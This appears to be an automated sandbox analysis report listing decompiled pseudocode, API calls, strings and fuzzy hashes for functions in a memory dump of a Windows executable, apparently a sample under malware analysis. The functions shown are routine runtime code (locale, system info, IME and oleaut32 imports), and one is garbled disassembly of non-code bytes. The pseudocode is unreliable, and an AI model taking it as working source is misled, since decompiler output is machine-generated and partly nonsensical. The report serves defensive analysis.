				_t35 = GetDiskFreeSpaceA(_v32,  &_v8,  &_v12,  &_v16,  &_v20);
				_v28 = _v8 * _v12;
				_v24 = 0;
				_t51 = _v24;
				_t40 = E00404FA8(_v28, _t51, _v16, 0);
				_t46 = _a8;
				 *_t46 = _t40;
				 *((intOrPtr*)(_t46 + 4)) = _t51;
				_t53 = _v24;
				_t43 = E00404FA8(_v28, _t53, _v20, 0);
				_t47 = _a12;
				 *_t47 = _t43;
				 *((intOrPtr*)(_t47 + 4)) = _t53;
				return _t35;
			}

0x004085c7
0x004085cc
0x004085d5
0x004085ce
0x004085ce
0x004085ce
0x004085ec
0x004085fb
0x004085fe
0x0040860b
0x0040860e
0x00408613
0x00408616
0x00408618
0x00408625
0x00408628
0x0040862d
0x00408630
0x00408632
0x0040863b

APIs

GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 004085EC

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: DiskFreeSpace
String ID:
API String ID: 1705453755-0
Opcode ID: dc20761dc868d6fab9248eacf8ac21003288b8fbdfae51187ef1d0f57f68d21e
Instruction ID: dbe6ec5d6b810ea91c69dd887cac605aceebc644579eaafd21af76e645984789
Opcode Fuzzy Hash: dc20761dc868d6fab9248eacf8ac21003288b8fbdfae51187ef1d0f57f68d21e
Instruction Fuzzy Hash: 0311AFB1E00109AFDB44DF99C9819EFF7F9EF8C304B54817AA519E7250EA359A018BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00424C58, Relevance: 1.5, APIs: 1, Instructions: 41
nativeCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00424C58(intOrPtr __eax, intOrPtr* __edx) {
				intOrPtr _v8;
				intOrPtr _t12;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;

				_v8 = __eax;
				_t22 =  *__edx;
				_t26 = _t22 - 0x113;
				if(_t22 != 0x113) {
					_push( *((intOrPtr*)(__edx + 8)));
					_push( *((intOrPtr*)(__edx + 4)));
					_push(_t22);
					_t12 =  *((intOrPtr*)(_v8 + 0x34));
					_push(_t12);
					L0040668C();
					 *((intOrPtr*)(__edx + 0xc)) = _t12;
					return _t12;
				}
				_push(0x424c92);
				_push( *[fs:eax]);
				 *[fs:eax] = _t25;
				E00403674(_v8, _t26);
				_pop(_t21);
				 *[fs:eax] = _t21;
				return 0;
			}

0x00424c61
0x00424c64
0x00424c66
0x00424c6c
0x00424cb0
0x00424cb4
0x00424cb5
0x00424cb9
0x00424cbc
0x00424cbd
0x00424cc2
0x00000000
0x00424cc2
0x00424c71
0x00424c76
0x00424c79
0x00424c83
0x00424c8a
0x00424c8d
0x00000000

APIs

NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 00424CBD

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
Opcode ID: 84d45a41c838f2fa888901153c13ec9cef30d28358159fdd4b4fa576ca6812bd
Instruction ID: 317cdff58a45fd7c29f878d03715a96f2cfd89be59db7778aaa6d4ac5735af7b
Opcode Fuzzy Hash: 84d45a41c838f2fa888901153c13ec9cef30d28358159fdd4b4fa576ca6812bd
Instruction Fuzzy Hash: B1F0C276605214AF9B00CF9EE881C56B7ECEB4972039284B6F908D7340D635AD008A74

Uniqueness

Uniqueness Score: -1.00%

Function 00405E24, Relevance: 1.5, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E00405E24(int __eax, void* __ebx, void* __eflags) {
				char _v8;
				char _v15;
				char _v20;
				intOrPtr _t29;
				void* _t32;

				_v20 = 0;
				_push(_t32);
				_push(0x405e8a);
				_push( *[fs:edx]);
				 *[fs:edx] = _t32 + 0xfffffff0;
				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
				E00404450( &_v20, 7,  &_v15);
				E00402EA4(_v20,  &_v8);
				if(_v8 != 0) {
				}
				_pop(_t29);
				 *[fs:eax] = _t29;
				_push(E00405E91);
				return E004041E0( &_v20);
			}

0x00405e2d
0x00405e32
0x00405e33
0x00405e38
0x00405e3b
0x00405e4a
0x00405e5a
0x00405e65
0x00405e70
0x00405e70
0x00405e76
0x00405e79
0x00405e7c
0x00405e89

APIs

GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00405E8A), ref: 00405E4A

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 7a0848b3c2da6ed0b53c1eef4dcff661b8127fc4aa43b29f5ade3943612a5f30
Instruction ID: 1f1f89246b2eed5bcf448db52d995c3961ec8abd47e4ee13cc9423f4ec1ef507
Opcode Fuzzy Hash: 7a0848b3c2da6ed0b53c1eef4dcff661b8127fc4aa43b29f5ade3943612a5f30
Instruction Fuzzy Hash: 30F0C830904609AFEB14EF91CC41AEFB376FBC4714F00857AE120765D0E7B82B44CA84

Uniqueness

Uniqueness Score: -1.00%

Function 0041DFA0, Relevance: 1.5, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0041DFA0(intOrPtr __eax, intOrPtr __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v48;
				struct _SYSTEM_INFO* _t17;
				unsigned int _t20;
				unsigned int _t22;
				signed int _t31;
				intOrPtr _t33;

				_v12 = __edx;
				_v8 = __eax;
				_t17 =  &_v48;
				GetSystemInfo(_t17);
				_t33 = _v8;
				_t31 = _v12 - 1;
				if(_t31 >= 0) {
					if( *((short*)( &_v48 + 0x20)) == 3) {
						do {
							_t20 =  *(_t33 + _t31 * 4) >> 0x10;
							 *(_t33 + _t31 * 4) = _t20;
							_t31 = _t31 - 1;
						} while (_t31 >= 0);
						return _t20;
					} else {
						goto L2;
					}
					do {
						L2:
						asm("bswap eax");
						_t22 =  *(_t33 + _t31 * 4) >> 8;
						 *(_t33 + _t31 * 4) = _t22;
						_t31 = _t31 - 1;
					} while (_t31 >= 0);
					return _t22;
				}
				return _t17;
			}

0x0041dfa6
0x0041dfa9
0x0041dfac
0x0041dfb0
0x0041dfb5
0x0041dfbb
0x0041dfbc
0x0041dfc6
0x0041dfd9
0x0041dfe2
0x0041dfea
0x0041dfed
0x0041dfed
0x00000000
0x00000000
0x00000000
0x00000000
0x0041dfc8
0x0041dfc8
0x0041dfcb
0x0041dfcd
0x0041dfd0
0x0041dfd3
0x0041dfd3
0x00000000
0x0041dfc8
0x0041dff4

APIs

GetSystemInfo.KERNEL32(?), ref: 0041DFB0

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 5399972255b92a3fca5b2866e267ce3bd624c49bccd81e0362f108dba5755595
Instruction ID: 16753a57fa43138d6eb89ff9f16b64fadaf90e2e55725c96f9a61c426af0338f
Opcode Fuzzy Hash: 5399972255b92a3fca5b2866e267ce3bd624c49bccd81e0362f108dba5755595
Instruction Fuzzy Hash: 20F0F6B2D001099FCB04DF98C484CDCF7B4FB56301B40429AD405E7382EB38A6D2CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0040AE50, Relevance: 1.5, APIs: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AE50(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
				char _v260;
				intOrPtr _t10;
				void* _t18;

				_t18 = __ecx;
				_t10 = _a4;
				if(GetLocaleInfoA(__eax, __edx,  &_v260, 0x100) <= 0) {
					return E00404234(_t10, _t18);
				}
				return E004042D0(_t10, _t5 - 1,  &_v260);
			}

0x0040ae5b
0x0040ae5d
0x0040ae75
0x00000000
0x0040ae8d
0x00000000

APIs

GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040AE6E

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: dc6b5896c60b5f6fdc82ebe8b48d2fb40eb89506892b10ecb155b7528148c1be
Instruction ID: 6eacdcebaf929e3570d169f18aa0b1c6badafa638c334ab221c875e1a54e7cfc
Opcode Fuzzy Hash: dc6b5896c60b5f6fdc82ebe8b48d2fb40eb89506892b10ecb155b7528148c1be
Instruction Fuzzy Hash: C6E0927170031416D711A5599C82AF6735CA758350F0042BFBE09E73C2EDB49D5486EA

Uniqueness

Uniqueness Score: -1.00%

Function 0040AE9C, Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040AE9C(int __eax, char __ecx, int __edx) {
				char _v16;
				char _t5;
				char _t6;

				_push(__ecx);
				_t6 = __ecx;
				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
					_t5 = _t6;
				} else {
					_t5 = _v16;
				}
				return _t5;
			}

0x0040ae9f
0x0040aea0
0x0040aeb6
0x0040aebd
0x0040aeb8
0x0040aeb8
0x0040aeb8
0x0040aec3

APIs

GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040C73A,00000000,0040C953,?,?,00000000,00000000), ref: 0040AEAF

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 108ed64d26be4b16351a3299da70f0ce3c1942d88d3b1a3c3d23116fd3835508
Instruction ID: 15abc15796c64136693fc8185d68c91663dfa503a6783919a9878fdd7897f299
Opcode Fuzzy Hash: 108ed64d26be4b16351a3299da70f0ce3c1942d88d3b1a3c3d23116fd3835508
Instruction Fuzzy Hash: D6D05E6631D2502AE210515A6D89DBB4B9CCAC57A0F10453AB949D6342D2348C1A93F6

Uniqueness

Uniqueness Score: -1.00%

Function 00409924, Relevance: 1.5, APIs: 1, Instructions: 6
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409924() {
				struct _SYSTEMTIME* _t2;

				GetLocalTime(_t2);
				return _t2->wYear;
			}

0x00409928
0x00409934

APIs

GetLocalTime.KERNEL32 ref: 00409928

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: LocalTime
String ID:
API String ID: 481472006-0
Opcode ID: 80ca86d94422d439cfffebf3b4cdc8deee35977a39276b931823f931439d9733
Instruction ID: a81bf4aa9ff04115b09102d2dc2e2a6797d93558e608b32b1fce2056f0cd125a
Opcode Fuzzy Hash: 80ca86d94422d439cfffebf3b4cdc8deee35977a39276b931823f931439d9733
Instruction Fuzzy Hash: 1AA0120840480141D54033180C0315830405800620FC40754ACB8103D2E93D023481DB

Uniqueness

Uniqueness Score: -1.00%

Function 00406179, Relevance: .1, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00406179() {
				void* _t21;
				signed int _t22;
				signed int _t23;
				void* _t25;
				signed char _t26;
				signed char _t27;
				void* _t28;
				signed char _t29;
				intOrPtr* _t32;
				void* _t33;
				intOrPtr* _t36;
				signed int _t40;
				void* _t42;
				signed int _t43;
				void* _t49;
				signed int _t50;
				void* _t54;
				signed int _t55;
				void* _t59;

				asm("popad");
				_t22 = _t21 + 1;
				 *_t26 =  *_t26 + _t22;
				_t29 = _t28 +  *_t36;
				 *0 =  *0 ^ _t22;
				_t23 = _t22;
				 *_t23 =  *_t23 + _t23;
				if( *_t23 < 0) {
					L8:
					asm("outsd");
					_t54 = _t36 - 1 + 1;
					asm("outsd");
					asm("arpl [ebp+0x73], si");
					_push(_t32);
					asm("arpl [gs:ebx+ecx+0x6f], si");
					_push(_t32);
					if(_t54 >= 0) {
						L25:
						goto ( *0x47c2ec);
					}
					L9:
					if(_t54 < 0) {
						return;
						L30:
						 *((intOrPtr*)(_t26 - 0x1fda0040)) =  *((intOrPtr*)(_t26 - 0x1fda0040)) + _t29;
					}
					 *[fs:ebx] =  *[fs:ebx] ^ _t29;
					_t55 =  *[fs:ebx];
					L11:
					asm("outsd");
					_push(_t32);
					if(_t55 >= 0) {
						 *((intOrPtr*)(_t26 - 0x1bda0040)) =  *((intOrPtr*)(_t26 - 0x1bda0040)) + _t29;
						return;
					}
					if(_t55 < 0) {
						_t27 = _t26 >> 0x25;
						goto ( *0x47c2dc);
					}
					_t29 = _t29 ^  *[fs:esi];
					asm("outsd");
					_t26 = _t26 + 1;
					asm("outsd");
					asm("insd");
					asm("bound ebp, [edi+0x42]");
					asm("outsd");
					if(_t26 < 0) {
						 *((intOrPtr*)(_t26 - 0x13da0040)) =  *((intOrPtr*)(_t26 - 0x13da0040)) + _t29;
						goto L25;
					}
					L15:
					_t40 =  *(_t33 + _t23 + 0x57) * 0x6f646e69;
					if(_t40 > 0) {
						L35:
						L36:
						goto ( *0x47c2d0);
					}
					_t25 = _t23 - 0x62 + 1;
					 *_t40 =  *_t40 + _t25;
					_t59 =  *_t40;
					asm("andps xmm1, [edi+0x77]");
					asm("outsb");
					if(_t59 < 0) {
						goto L30;
					}
					L17:
					if(_t59 < 0) {
						 *((intOrPtr*)(_t27 - 0x2fda0040)) =  *((intOrPtr*)(_t27 - 0x2fda0040)) + _t29;
						goto L35;
					}
					if(_t59 > 0) {
						goto ( *0x47c2d8);
					}
					if(_t59 == 0) {
						goto L36;
					}
					if(_t59 == 0) {
						goto ( *0x47c2cc);
					}
					_t33 = _t33 +  *((intOrPtr*)(_t25 + 0x61));
					_t23 = _t25 + 1;
					 *((intOrPtr*)(_t26 - 0xbda0040)) =  *((intOrPtr*)(_t26 - 0xbda0040)) + _t29;
					goto ( *0x47c1f4);
				}
				_t23 = _t23 + 1;
				 *_t32 =  *_t32 + _t29;
				asm("outsd");
				_push(_t26);
				asm("gs insb");
				asm("arpl [gs:ebp+0x64], si");
				 *(_t33 + 0x64) =  *(_t33 + 0x64) | _t29;
				_t33 = _t33 + 1;
				_t49 = _t33;
				if(_t49 < 0) {
					goto L9;
				}
				if(_t49 >= 0) {
					goto L11;
				}
				_t29 = _t29 |  *[fs:edi+0x64];
				 *(_t33 + 0x64) =  *(_t33 + 0x64) | _t43;
				_t27 = _t26 + 1;
				_push(0x656b6365);
				 *[fs:edi+0x64] =  *[fs:edi+0x64] | _t43;
				_t42 = 1 +  *(_t26 + 0x61) * 0x64656c62;
				asm("outsd");
				asm("arpl [ebp+0x73], si");
				 *[fs:edi+0x64] =  *[fs:edi+0x64] | _t43;
				_t50 =  *[fs:edi+0x64];
				asm("popa");
				if(_t50 != 0) {
					goto L17;
				}
				if(_t50 == 0) {
					L7:
					asm("outsb");
					asm("popad");
					asm("arpl [ecx+ebp*2+0x76], si");
					 *[gs:edi+0x64] =  *[gs:edi+0x64] | _t43;
					_t36 = _t42 - 1;
					asm("outsd");
					_t29 = (_t29 |  *(_t33 + 0x64)) - 1 + 1;
					asm("arpl [ebx+0x65], sp");
					asm("insb");
					_t23 = _t23 | 0x6f4e646f;
					goto L8;
				}
				asm("outsd");
				_t23 = _t23 - 1;
				asm("outsd");
				if(_t23 == 0) {
					goto L15;
				}
				goto L7;
			}

0x00406179
0x0040617a
0x0040617b
0x0040617d
0x0040617f
0x00406185
0x00406187
0x00406189
0x004061ec
0x004061ee
0x004061ef
0x004061f0
0x004061f1
0x004061f4
0x004061f5
0x004061fa
0x004061fc
0x00406264
0x00406264
0x00406264
0x004061ff
0x004061ff
0x00406277
0x00406279
0x00406279
0x00406279
0x00406201
0x00406201
0x00406205
0x00406205
0x00406206
0x00406208
0x00406271
0x00000000
0x00406271
0x0040620b
0x00406283
0x00406284
0x00406284
0x0040620d
0x00406211
0x00406212
0x00406214
0x00406215
0x00406216
0x00406219
0x0040621a
0x00406261
0x00000000
0x00406261
0x0040621d
0x0040621d
0x00406225
0x00000000
0x0040629c
0x0040629c
0x0040629c
0x0040622a
0x0040622b
0x0040622b
0x0040622d
0x00406231
0x00406232
0x00000000
0x00000000
0x00406235
0x00406235
0x00406299
0x00000000
0x00406299
0x00406237
0x0040628c
0x0040628c
0x00406239
0x00000000
0x00000000
0x0040623b
0x004062a4
0x004062a4
0x0040623d
0x00406240
0x00406241
0x00406244
0x00406244
0x0040618b
0x0040618c
0x0040618e
0x0040618f
0x00406191
0x00406193
0x00406198
0x0040619b
0x0040619b
0x0040619c
0x00000000
0x00000000
0x0040619e
0x00000000
0x00000000
0x004061a0
0x004061ac
0x004061af
0x004061b0
0x004061b5
0x004061b9
0x004061ba
0x004061bb
0x004061be
0x004061be
0x004061c4
0x004061c7
0x00000000
0x00000000
0x004061c9
0x004061d5
0x004061d9
0x004061da
0x004061db
0x004061df
0x004061e3
0x004061e4
0x004061e5
0x004061e6
0x004061e9
0x004061ea
0x00000000
0x004061ea
0x004061cb
0x004061cc
0x004061ce
0x004061cf
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32edee84cd40f27e41f7858b69e2e9c5b9b5180446c01a9f2504cc3c8ee834c4
Instruction ID: 95090e85823fe221f2b8bb975a4292f61201f404212568eed8392fe4257db1a2
Opcode Fuzzy Hash: 32edee84cd40f27e41f7858b69e2e9c5b9b5180446c01a9f2504cc3c8ee834c4
Instruction Fuzzy Hash: CF410431509B819BCB269F249B75782BF21FB13300B1986EFC49A665A3D33D7521C75C

Uniqueness

Uniqueness Score: -1.00%

Function 00436D04, Relevance: 49.1, APIs: 15, Strings: 13, Instructions: 95
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00436D04() {
				int _v8;
				intOrPtr _t4;
				struct HINSTANCE__* _t11;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t15;
				struct HINSTANCE__* _t17;
				struct HINSTANCE__* _t19;
				struct HINSTANCE__* _t21;
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t25;
				struct HINSTANCE__* _t27;
				struct HINSTANCE__* _t29;
				intOrPtr _t40;
				intOrPtr _t42;
				intOrPtr _t44;

				_t42 = _t44;
				_t4 =  *0x47a120; // 0x47b738
				if( *((char*)(_t4 + 0xc)) == 0) {
					return _t4;
				} else {
					_v8 = SetErrorMode(0x8000);
					_push(_t42);
					_push(0x436e6a);
					_push( *[fs:eax]);
					 *[fs:eax] = _t44;
					if( *0x47bb50 == 0) {
						 *0x47bb50 = GetProcAddress(GetModuleHandleA("USER32"), "WINNLSEnableIME");
					}
					if( *0x479a88 == 0) {
						 *0x479a88 = LoadLibraryA("imm32.dll");
						if( *0x479a88 != 0) {
							_t11 =  *0x479a88; // 0x0
							 *0x47bb54 = GetProcAddress(_t11, "ImmGetContext");
							_t13 =  *0x479a88; // 0x0
							 *0x47bb58 = GetProcAddress(_t13, "ImmReleaseContext");
							_t15 =  *0x479a88; // 0x0
							 *0x47bb5c = GetProcAddress(_t15, "ImmGetConversionStatus");
							_t17 =  *0x479a88; // 0x0
							 *0x47bb60 = GetProcAddress(_t17, "ImmSetConversionStatus");
							_t19 =  *0x479a88; // 0x0
							 *0x47bb64 = GetProcAddress(_t19, "ImmSetOpenStatus");
							_t21 =  *0x479a88; // 0x0
							 *0x47bb68 = GetProcAddress(_t21, "ImmSetCompositionWindow");
							_t23 =  *0x479a88; // 0x0
							 *0x47bb6c = GetProcAddress(_t23, "ImmSetCompositionFontA");
							_t25 =  *0x479a88; // 0x0
							 *0x47bb70 = GetProcAddress(_t25, "ImmGetCompositionStringA");
							_t27 =  *0x479a88; // 0x0
							 *0x47bb74 = GetProcAddress(_t27, "ImmIsIME");
							_t29 =  *0x479a88; // 0x0
							 *0x47bb78 = GetProcAddress(_t29, "ImmNotifyIME");
						}
					}
					_pop(_t40);
					 *[fs:eax] = _t40;
					_push(0x436e71);
					return SetErrorMode(_v8);
				}
			}

0x00436d05
0x00436d09
0x00436d12
0x00436e74
0x00436d18
0x00436d22
0x00436d27
0x00436d28
0x00436d2d
0x00436d30
0x00436d3a
0x00436d53
0x00436d53
0x00436d5f
0x00436d6f
0x00436d7b
0x00436d86
0x00436d91
0x00436d9b
0x00436da6
0x00436db0
0x00436dbb
0x00436dc5
0x00436dd0
0x00436dda
0x00436de5
0x00436def
0x00436dfa
0x00436e04
0x00436e0f
0x00436e19
0x00436e24
0x00436e2e
0x00436e39
0x00436e43
0x00436e4e
0x00436e4e
0x00436d7b
0x00436e55
0x00436e58
0x00436e5b
0x00436e69
0x00436e69

APIs

SetErrorMode.KERNEL32(00008000), ref: 00436D1D
GetModuleHandleA.KERNEL32(USER32,00000000,00436E6A,?,00008000), ref: 00436D41
GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 00436D4E
LoadLibraryA.KERNEL32(imm32.dll,00000000,00436E6A,?,00008000), ref: 00436D6A
GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 00436D8C
GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00436DA1
GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 00436DB6
GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 00436DCB
GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 00436DE0
GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 00436DF5
GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 00436E0A
GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 00436E1F
GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 00436E34
GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00436E49
SetErrorMode.KERNEL32(?,00436E71,00008000), ref: 00436E64

Strings

ImmReleaseContext, xrefs: 00436D96
ImmIsIME, xrefs: 00436E29
ImmGetContext, xrefs: 00436D81
WINNLSEnableIME, xrefs: 00436D48
imm32.dll, xrefs: 00436D65
ImmNotifyIME, xrefs: 00436E3E
ImmSetConversionStatus, xrefs: 00436DC0
ImmSetCompositionFontA, xrefs: 00436DFF
ImmSetCompositionWindow, xrefs: 00436DEA
ImmGetConversionStatus, xrefs: 00436DAB
ImmGetCompositionStringA, xrefs: 00436E14
ImmSetOpenStatus, xrefs: 00436DD5
USER32, xrefs: 00436D3C

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorMode$HandleLibraryLoadModule
String ID: ImmGetCompositionStringA$ImmGetContext$ImmGetConversionStatus$ImmIsIME$ImmNotifyIME$ImmReleaseContext$ImmSetCompositionFontA$ImmSetCompositionWindow$ImmSetConversionStatus$ImmSetOpenStatus$USER32$WINNLSEnableIME$imm32.dll
API String ID: 3397921170-3950384806
Opcode ID: 07112a71691079262c74674ea447bcc2c1e25a10dcb0029e4381786d83904e0a
Instruction ID: 032e71c8a77e308d49970952607f634574abd0b5a9e40cd966f72ceb36bd1caf
Opcode Fuzzy Hash: 07112a71691079262c74674ea447bcc2c1e25a10dcb0029e4381786d83904e0a
Instruction Fuzzy Hash: 7E31A374600381BEDB00DB69EC46F5937E8E748704F52A03BB908979A6DB7C5C84CB5C

Uniqueness

Uniqueness Score: -1.00%

Function 0040DD9C, Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040DD9C() {
				struct HINSTANCE__* _v8;
				intOrPtr _t46;
				void* _t91;

				_v8 = GetModuleHandleA("oleaut32.dll");
				 *0x47b7c0 = E0040DD70("VariantChangeTypeEx", E0040D90C, _t91);
				 *0x47b7c4 = E0040DD70("VarNeg", E0040D93C, _t91);
				 *0x47b7c8 = E0040DD70("VarNot", E0040D93C, _t91);
				 *0x47b7cc = E0040DD70("VarAdd", E0040D948, _t91);
				 *0x47b7d0 = E0040DD70("VarSub", E0040D948, _t91);
				 *0x47b7d4 = E0040DD70("VarMul", E0040D948, _t91);
				 *0x47b7d8 = E0040DD70("VarDiv", E0040D948, _t91);
				 *0x47b7dc = E0040DD70("VarIdiv", E0040D948, _t91);
				 *0x47b7e0 = E0040DD70("VarMod", E0040D948, _t91);
				 *0x47b7e4 = E0040DD70("VarAnd", E0040D948, _t91);
				 *0x47b7e8 = E0040DD70("VarOr", E0040D948, _t91);
				 *0x47b7ec = E0040DD70("VarXor", E0040D948, _t91);
				 *0x47b7f0 = E0040DD70("VarCmp", E0040D954, _t91);
				 *0x47b7f4 = E0040DD70("VarI4FromStr", E0040D960, _t91);
				 *0x47b7f8 = E0040DD70("VarR4FromStr", E0040D9CC, _t91);
				 *0x47b7fc = E0040DD70("VarR8FromStr", E0040DA38, _t91);
				 *0x47b800 = E0040DD70("VarDateFromStr", E0040DAA4, _t91);
				 *0x47b804 = E0040DD70("VarCyFromStr", E0040DB10, _t91);
				 *0x47b808 = E0040DD70("VarBoolFromStr", E0040DB7C, _t91);
				 *0x47b80c = E0040DD70("VarBstrFromCy", E0040DBFC, _t91);
				 *0x47b810 = E0040DD70("VarBstrFromDate", E0040DC6C, _t91);
				_t46 = E0040DD70("VarBstrFromBool", E0040DCDC, _t91);
				 *0x47b814 = _t46;
				return _t46;
			}

0x0040ddaa
0x0040ddbe
0x0040ddd4
0x0040ddea
0x0040de00
0x0040de16
0x0040de2c
0x0040de42
0x0040de58
0x0040de6e
0x0040de84
0x0040de9a
0x0040deb0
0x0040dec6
0x0040dedc
0x0040def2
0x0040df08
0x0040df1e
0x0040df34
0x0040df4a
0x0040df60
0x0040df76
0x0040df86
0x0040df8c
0x0040df93

APIs

GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0040DDA5

Part of subcall function 0040DD70: GetProcAddress.KERNEL32(00000000), ref: 0040DD89

Strings

VariantChangeTypeEx, xrefs: 0040DDB3
VarDateFromStr, xrefs: 0040DF13
VarOr, xrefs: 0040DE8F
